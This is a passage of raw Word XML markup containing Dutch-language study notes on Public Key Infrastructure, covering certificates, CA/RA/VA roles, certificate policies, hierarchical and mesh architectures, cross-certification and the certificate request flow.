      <w:r w:rsidR="0056055D">
        <w:t>, v</w:t>
      </w:r>
      <w:r>
        <w:t>ia Public Key Infrastructure</w:t>
      </w:r>
      <w:r w:rsidR="00916E8A">
        <w:t xml:space="preserve"> kan je dit beheren (PKI)</w:t>
      </w:r>
      <w:r w:rsidR="00404A0B">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E852BA7" w14:textId="77777777" w:rsidR="0056055D" w:rsidRDefault="0056055D" w:rsidP="00BD2402"/>
    <w:p w14:paraId="25E8711F" w14:textId="6C37433D" w:rsidR="0056055D" w:rsidRDefault="0056055D" w:rsidP="0056055D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Dit is een technologie die gebruikt wordt voor een encryptie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40AA9C34" w14:textId="7CDF8A86" w:rsidR="0056055D" w:rsidRDefault="0056055D" w:rsidP="0056055D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>De infrastructuur bestaat ook Certification Authorities en Security Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1B7EE3" w14:textId="26D2427F" w:rsidR="0056055D" w:rsidRDefault="0056055D" w:rsidP="0056055D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>De services bestaan uit vertrouwelijkheid, authenticiteit, integriteit en onweerlegbaarheid!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9BC141" w14:textId="77777777" w:rsidR="00306D47" w:rsidRDefault="00306D47" w:rsidP="00306D47"/>
    <w:p w14:paraId="1391070F" w14:textId="381F04E6" w:rsidR="00B9773D" w:rsidRDefault="00306D47" w:rsidP="00306D47">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3396"/>
        </w:tabs>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00306D47">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">Een certificaat verbindt </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>een Public Key aan een individu = Electronic ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2C2016" w14:textId="77777777" w:rsidR="00306D47" w:rsidRDefault="00306D47" w:rsidP="00306D47">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3396"/>
        </w:tabs>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20D7EBAC" w14:textId="50A2CA33" w:rsidR="00306D47" w:rsidRPr="00306D47" w:rsidRDefault="00E6013A" w:rsidP="00306D47">
      <w:r>
        <w:t>Deze certificaten wordten uitgereikt door een CA (Certification Authority)</w:t>
      </w:r>
      <w:r w:rsidR="000713A4">
        <w:t xml:space="preserve"> = trusted third party!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EBADAC4" w14:textId="77777777" w:rsidR="00250F21" w:rsidRDefault="00250F21" w:rsidP="007528A7"/>
    <w:p w14:paraId="1033E431" w14:textId="0F5E351B" w:rsidR="00105379" w:rsidRDefault="00105379" w:rsidP="007528A7">
      <w:r>
        <w:t>Een certificaat bestaat uit de Public Key en enkele extra gegevens</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3524FE5D" w14:textId="39B16396" w:rsidR="00105379" w:rsidRDefault="00105379" w:rsidP="00105379">
      <w:r>
        <w:t>Een certificaat is bovendien ondertekend door de CA zelf = garantie!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04313A70" w14:textId="6F9B87CB" w:rsidR="008B00BA" w:rsidRDefault="008B00BA" w:rsidP="00105379">
      <w:r>
        <w:t>Als je de CA vertrouwrt, vertrouw je ook de inhoud!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B871CA" w14:textId="77777777" w:rsidR="00E64E27" w:rsidRDefault="00E64E27" w:rsidP="00105379"/>
    <w:p w14:paraId="78F211D8" w14:textId="1154D832" w:rsidR="00E64E27" w:rsidRDefault="00E64E27" w:rsidP="00105379">
      <w:r>
        <w:t>Er zijn verschillende soorten certificaten</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A385E7" w14:textId="52CBDB01" w:rsidR="00E64E27" w:rsidRDefault="00E64E27" w:rsidP="00E64E27">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Persoonsgebonden</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D034DC9" w14:textId="6E02B0F9" w:rsidR="00E64E27" w:rsidRDefault="00E64E27" w:rsidP="00E64E27">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Rolgebonden</w:t>
      </w:r>
      <w:r w:rsidR="00A8399E">
        <w:t xml:space="preserve"> (denk aan een bepaalde functie in een bedrijf)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719D9E09" w14:textId="0EC31B80" w:rsidR="00E64E27" w:rsidRDefault="00E64E27" w:rsidP="00E64E27">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Toepassingsgebonden</w:t>
      </w:r>
      <w:r w:rsidR="005009C8">
        <w:t xml:space="preserve"> (denk </w:t>
      </w:r>
      <w:r w:rsidR="00A8399E">
        <w:t>aan server logging)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0385470F" w14:textId="49D3779F" w:rsidR="00E64E27" w:rsidRDefault="00E64E27" w:rsidP="00E64E27">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>SSL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477AB736" w14:textId="617486AF" w:rsidR="00E64E27" w:rsidRDefault="00E64E27" w:rsidP="00E64E27">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Signing</w:t>
      </w:r>
      <w:r w:rsidR="005009C8">
        <w:t xml:space="preserve"> (denk aan een JAR)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04DE95EC" w14:textId="77777777" w:rsidR="00F853FE" w:rsidRDefault="00F853FE" w:rsidP="00F853FE"/>
    <w:p w14:paraId="622546EF" w14:textId="219BF42D" w:rsidR="00F853FE" w:rsidRDefault="00F853FE" w:rsidP="00F853FE">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>PKI Componenten</w:t>
      </w:r>
      <w:r w:rsidR="00CD30AA">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00CD30AA" w:rsidRPr="00CD30AA">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>!</w:t>
      </w:r>
      <w:r w:rsidR="00CD30AA">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A0E184" w14:textId="77777777" w:rsidR="008A5D38" w:rsidRDefault="008A5D38" w:rsidP="008A5D38"/>
    <w:p w14:paraId="36F843D2" w14:textId="18BFB8F7" w:rsidR="008A5D38" w:rsidRDefault="008A5D38" w:rsidP="008A5D38">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00925BE1">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>CA</w:t>
      </w:r>
      <w:r w:rsidR="00CD30AA" w:rsidRPr="00925BE1">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CD30AA">
        <w:t>= Certification Authority</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545A1F59" w14:textId="3F0266A0" w:rsidR="00CD30AA" w:rsidRDefault="00CD30AA" w:rsidP="00CD30AA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Genereren, uitgave, distributie en intrekken van certificaten</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014A07E5" w14:textId="76F313F2" w:rsidR="008A5D38" w:rsidRDefault="008A5D38" w:rsidP="008A5D38">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00925BE1">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>RA</w:t>
      </w:r>
      <w:r w:rsidR="00CD30AA" w:rsidRPr="00925BE1">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CD30AA">
        <w:t>= Registration Authority</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A27E4E3" w14:textId="4784AD5C" w:rsidR="00CD30AA" w:rsidRDefault="00CD30AA" w:rsidP="00CD30AA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Registreren van gebruikers en identiteit vaststellen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58EF66DD" w14:textId="6651348E" w:rsidR="008A5D38" w:rsidRDefault="008A5D38" w:rsidP="008A5D38">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00925BE1">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>VA</w:t>
      </w:r>
      <w:r w:rsidR="00CD30AA" w:rsidRPr="00925BE1">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CD30AA">
        <w:t>= Validation Authority</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47FB748B" w14:textId="14B2D556" w:rsidR="00CD30AA" w:rsidRDefault="00CD30AA" w:rsidP="00CD30AA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Verifieren of certificaat niet is ingetrokken of opgeschort</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E3DAE1" w14:textId="35162896" w:rsidR="008A5D38" w:rsidRPr="00925BE1" w:rsidRDefault="008A5D38" w:rsidP="008A5D38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25BE1">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Repository</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BAEF9BE" w14:textId="5ACD0F64" w:rsidR="00CD30AA" w:rsidRDefault="00CD30AA" w:rsidP="00CD30AA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Opslagplaats van certificaten</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72AFBC05" w14:textId="2C66644C" w:rsidR="00CD30AA" w:rsidRDefault="00CD30AA" w:rsidP="00CD30AA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Opslagplaats van de blacklist (CRL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A76A7F4" w14:textId="17F57350" w:rsidR="008A5D38" w:rsidRPr="00925BE1" w:rsidRDefault="008A5D38" w:rsidP="008A5D38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25BE1">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Eindentiteiten</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F227593" w14:textId="22D5C7FE" w:rsidR="00CD30AA" w:rsidRDefault="00CD30AA" w:rsidP="00CD30AA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Aanvragen van certificaat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18056A90" w14:textId="7E661F28" w:rsidR="00CD30AA" w:rsidRDefault="00CD30AA" w:rsidP="00CD30AA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Aanmaken van Private en Public Keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1FE087" w14:textId="3E55767D" w:rsidR="008A5D38" w:rsidRDefault="008A5D38" w:rsidP="008A5D38">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00925BE1">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>CP</w:t>
      </w:r>
      <w:r w:rsidRPr="00925BE1">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">en </w:t>
      </w:r>
      <w:r w:rsidRPr="00925BE1">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>CPS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC6311A" w14:textId="043D01A1" w:rsidR="00CD30AA" w:rsidRDefault="00CD30AA" w:rsidP="00CD30AA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Certificate Policies en Certificate Practice Statement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045677C2" w14:textId="33744126" w:rsidR="00CD30AA" w:rsidRDefault="00CD30AA" w:rsidP="00CD30AA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Organisatorische en juridische richtlijnen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690D2176" w14:textId="4D4E520F" w:rsidR="00AB3BF8" w:rsidRPr="00925BE1" w:rsidRDefault="00AB3BF8" w:rsidP="00CD30AA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00925BE1">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>CP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C9A1BB" w14:textId="5F3E6BF8" w:rsidR="00AB3BF8" w:rsidRDefault="00AB3BF8" w:rsidP="00AB3BF8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Regels en normen die aan de Ca worden gesteld</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50AEDC18" w14:textId="1C896895" w:rsidR="00AB3BF8" w:rsidRDefault="00AB3BF8" w:rsidP="00AB3BF8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Beleidsniveau</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C0EE78" w14:textId="1E21A17F" w:rsidR="00AB3BF8" w:rsidRDefault="00AB3BF8" w:rsidP="00AB3BF8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Gestandarizeerd document</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7DE0B0" w14:textId="498BCFDC" w:rsidR="00AB3BF8" w:rsidRPr="00925BE1" w:rsidRDefault="00AB3BF8" w:rsidP="00AB3BF8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00925BE1">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>CPS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3D4BA6" w14:textId="13B1F960" w:rsidR="00AB3BF8" w:rsidRDefault="00AB3BF8" w:rsidP="00AB3BF8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>De door de CA gevolgde procedures om aan de regels te voldoen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177BD7C1" w14:textId="0510D7D1" w:rsidR="00C826F4" w:rsidRDefault="00C826F4" w:rsidP="00AB3BF8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>= Concreet implementeren van de CP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A91EE33" w14:textId="46BE59F9" w:rsidR="00FD5D79" w:rsidRDefault="00FD5D79" w:rsidP="00FD5D79">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Er zijn verschillende niveaus van vertrouwen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64AB810B" w14:textId="673E8E6A" w:rsidR="00524C8A" w:rsidRDefault="00FD5D79" w:rsidP="00214337">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Vastgelegd = IETF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E19FE6" w14:textId="77777777" w:rsidR="009C0DB5" w:rsidRDefault="009C0DB5" w:rsidP="009C0DB5"/>
    <w:p w14:paraId="2B14B06E" w14:textId="77777777" w:rsidR="009C0DB5" w:rsidRDefault="009C0DB5" w:rsidP="009C0DB5"/>
    <w:p w14:paraId="53C13A8F" w14:textId="1DA5D7C2" w:rsidR="009C0DB5" w:rsidRDefault="009C0DB5" w:rsidP="009C0DB5">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="009C0DB5">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E52FCAC" wp14:editId="24B1BCEF">
            <wp:extent cx="5629610" cy="5122720"/>
            <wp:effectExtent l="0" t="0" r="9525" b="8255"/>
            <wp:docPr id="10" name="Picture 10" descr="http://cfile24.uf.tistory.com/image/2008E90C4AA117441BAC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file24.uf.tistory.com/image/2008E90C4AA117441BAC4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31" cy="51277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1A9DA6A" w14:textId="77777777" w:rsidR="009C0DB5" w:rsidRDefault="009C0DB5" w:rsidP="009C0DB5">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CAE9675" w14:textId="46D87750" w:rsidR="00EA2859" w:rsidRDefault="00EA2859" w:rsidP="00EA2859">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc453378497"/>
      <w:r>
        <w:t>PKI Architectuur</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="70CEC13F" w14:textId="77777777" w:rsidR="00EA2859" w:rsidRDefault="00EA2859" w:rsidP="00EA2859"/>
    <w:p w14:paraId="7966016A" w14:textId="1C062674" w:rsidR="00EA2859" w:rsidRDefault="00EA2859" w:rsidP="00EA2859">
      <w:r>
        <w:t>2 soorten</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5951390A" w14:textId="335DD5F7" w:rsidR="00EA2859" w:rsidRPr="00925BE1" w:rsidRDefault="00EA2859" w:rsidP="00EA2859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25BE1">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Hierarchisch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E46541" w14:textId="5AFA20C8" w:rsidR="00EA2859" w:rsidRDefault="00EA2859" w:rsidP="00EA2859">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Veel toegepast</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="400D581D" w14:textId="48323BDB" w:rsidR="00EA2859" w:rsidRDefault="00EA2859" w:rsidP="00EA2859">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Iedereen kent de Public Key van de root CA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3931D7D8" w14:textId="0BB2D121" w:rsidR="00EA2859" w:rsidRDefault="00EA2859" w:rsidP="00EA2859">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Duidelijk in opbouw van de vertrouwensrelatie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2F17DA" w14:textId="407BA051" w:rsidR="00EA2859" w:rsidRDefault="00EA2859" w:rsidP="00EA2859">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Nadeel indien het vertrouwens tussen 2 CA’s wegvalt = hele structuur weg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4035D4" w14:textId="31E6374D" w:rsidR="00EA2859" w:rsidRPr="00925BE1" w:rsidRDefault="00EA2859" w:rsidP="00EA2859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25BE1">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Mesh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E24E511" w14:textId="76C1E073" w:rsidR="00FA69A5" w:rsidRDefault="00FA69A5" w:rsidP="00FA69A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Iedere CA is gelijkwaardig = geen root = geen hierarchie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0874753A" w14:textId="6F4A0361" w:rsidR="00FA69A5" w:rsidRDefault="00FA69A5" w:rsidP="00FA69A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Iedereen kent de Public Key van de lokale CA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CC8654" w14:textId="494FA8D5" w:rsidR="00FA69A5" w:rsidRDefault="00FA69A5" w:rsidP="00FA69A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Cross-certificering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0570894B" w14:textId="594BAAEF" w:rsidR="00FA69A5" w:rsidRDefault="00FA69A5" w:rsidP="00FA69A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Voordeel: Flexibiliteit, structuur valt niet weg!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100CE220" w14:textId="46E96D56" w:rsidR="00FA69A5" w:rsidRDefault="00FA69A5" w:rsidP="00FA69A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Nadeel: Niet duidelijk hoe de vertrouwensrelatie juist is</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCD561A" w14:textId="77777777" w:rsidR="006D0585" w:rsidRDefault="006D0585" w:rsidP="006D0585">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0066C08D" w14:textId="206AD07F" w:rsidR="006D0585" w:rsidRDefault="006D0585" w:rsidP="006D0585">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Cross-certificering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626D9144" w14:textId="17715606" w:rsidR="006D0585" w:rsidRDefault="006D0585" w:rsidP="006D0585">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Wederzijdse erkenning van 2 CA’s op basis van CPS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04DE30D4" w14:textId="77777777" w:rsidR="00271108" w:rsidRDefault="00271108" w:rsidP="00271108"/>
    <w:p w14:paraId="419E69FD" w14:textId="64B688CE" w:rsidR="00271108" w:rsidRDefault="00271108" w:rsidP="00271108">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Certificaataanvraag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550A6414" w14:textId="34E648F6" w:rsidR="00271108" w:rsidRDefault="00271108" w:rsidP="00271108">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>A -&gt; Public Key -&gt; RA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3C9328" w14:textId="217B6379" w:rsidR="00271108" w:rsidRDefault="00271108" w:rsidP="00271108">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>RA -&gt; Certifcaat voor A -&gt; CA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0189E0A2" w14:textId="4798FEFD" w:rsidR="00271108" w:rsidRDefault="00271108" w:rsidP="00271108">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>CA keurt goed en ondertekent -&gt; A ontvangt certificaat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3511E0F4" w14:textId="77777777" w:rsidR="00271108" w:rsidRDefault="00271108" w:rsidP="00271108">
